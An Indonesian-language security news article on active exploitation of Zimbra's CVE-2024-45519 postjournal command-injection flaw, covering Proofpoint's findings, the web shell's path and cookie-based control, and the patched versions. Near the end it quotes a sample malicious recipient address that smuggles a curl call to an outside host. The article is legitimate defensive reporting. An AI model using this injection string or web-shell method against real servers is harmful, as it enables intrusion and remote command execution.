Peneliti keamanan siber memperingatkan tentang upaya eksploitasi aktif yang menargetkan kelemahan keamanan yang baru terungkap dalam Kolaborasi Zimbra Synacor.
Perusahaan keamanan perusahaan Proofpoint mengatakan pihaknya mulai mengamati aktivitas tersebut mulai tanggal 28 September 2024. Serangan tersebut berupaya mengeksploitasi CVE-2024-45519, sebuah kelemahan keamanan parah dalam layanan pasca-jurnalnya yang memungkinkan penyerang yang tidak diautentikasi untuk menjalankan perintah sewenang-wenang pada instalasi Zimbra yang terkena dampak.
“Email spoofing Gmail dikirim ke alamat palsu di kolom CC dalam upaya server Zimbra untuk menguraikan dan menjalankannya sebagai perintah,” kata Proofpoint dalam serangkaian postingan di X. “Alamat tersebut berisi string Base64 yang dieksekusi dengan dia utilitas.”
Masalah kritis ini telah diatasi oleh Zimbra dalam versi 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, dan 10.1.1 yang dirilis pada 4 September 2024. Seorang peneliti keamanan bernama lebr0nli (Alan Li) telah berjasa menemukan dan melaporkan kekurangannya.
“Meskipun fitur postjournal mungkin opsional atau tidak diaktifkan pada sebagian besar sistem, patch yang disediakan masih perlu diterapkan untuk mencegah potensi eksploitasi,” Ashish Kataria, insinyur arsitek keamanan di Synacor, mencatat dalam komentar pada 19 September 2024.
“Untuk sistem Zimbra di mana fitur postjournal tidak diaktifkan dan patch tidak dapat segera diterapkan, menghapus biner postjournal dapat dianggap sebagai tindakan sementara hingga patch dapat diterapkan.”
Proofpoint mengatakan pihaknya mengidentifikasi serangkaian alamat CC, yang ketika didekodekan, berupaya menulis shell web pada server Zimbra yang rentan di lokasi: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp.”
Shell web yang terinstal kemudian mendengarkan koneksi masuk dengan bidang Cookie JSESSIONID yang telah ditentukan sebelumnya, dan jika ada, ia melanjutkan untuk mengurai cookie JACTION untuk perintah Base64.
Shell web dilengkapi dengan dukungan untuk eksekusi perintah melalui exec. Alternatifnya, ia juga dapat mengunduh dan mengeksekusi file melalui koneksi soket. Serangan tersebut belum dikaitkan dengan aktor atau kelompok ancaman yang diketahui hingga tulisan ini dibuat.
Meskipun demikian, aktivitas eksploitasi tampaknya telah dimulai sehari setelah Project Discovery merilis rincian teknis dari kelemahan tersebut, yang mengatakan bahwa kelemahan tersebut “berasal dari masukan pengguna yang tidak disterilkan yang diteruskan ke popen dalam versi yang belum dipatch, sehingga memungkinkan penyerang untuk memasukkan perintah sewenang-wenang.”
Perusahaan keamanan siber masalahnya berakar pada cara biner pasca-jurnal berbasis C menangani dan mem-parsing alamat email penerima dalam fungsi yang disebut “msg_handler(),” sehingga memungkinkan injeksi perintah pada layanan yang berjalan pada port 10027 ketika meneruskan pesan SMTP yang dibuat khusus dengan alamat palsu (misalnya, “aabbb$(curl${IFS}oast.me)”@mail.domain.com).
Mengingat upaya eksploitasi aktif, pengguna sangat disarankan untuk menerapkan patch terbaru untuk perlindungan optimal terhadap potensi ancaman.